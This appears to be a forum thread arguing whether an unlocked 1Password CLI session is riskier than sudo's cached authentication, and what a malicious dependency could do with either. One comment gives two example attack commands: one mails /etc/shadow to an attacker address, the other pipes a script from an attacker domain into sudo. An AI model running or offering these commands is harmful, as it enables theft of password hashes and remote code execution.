only applies to the current terminal session, this applied from any session including build sub-sessions.
but yah, you're right it's a very low-risk attack.
only applies to the current terminal session, this applied from any session including build sub-sessions.
but yah, you're right it's a very low-risk attack.
Low-risk in terms of what? They’re superficially similar only in that both cache authentication for convenience. But the consequences are totally different. Sudo caches auth to let you run privileged commands locally; it doesn’t hand secrets to other processes. An unlocked 1Password CLI session can be abused by any code that can call the CLI (or read its session token) to export and ship vault contents, that’s an exfiltration vector, not just local privilege reuse. I’d rate that much higher risk personally.
the chance the dependency you've just updated and your vault being unlocked at the same exact time, if someone is attacked by a malicious dependency you have bigger problems to worry about.
sudo cat /etc/shadow | mail attacker@gmail.com
or wget https://attacker.com/install_special_pam_bypass.sh | sudo install_special_pam_bypass.sh
Could a terminal not cross access whatever properties the sudo time-out sets on another terminal session? E.g via /proc?
no, because the session you are in does not have access to edit /proc and in some instances even read /proc.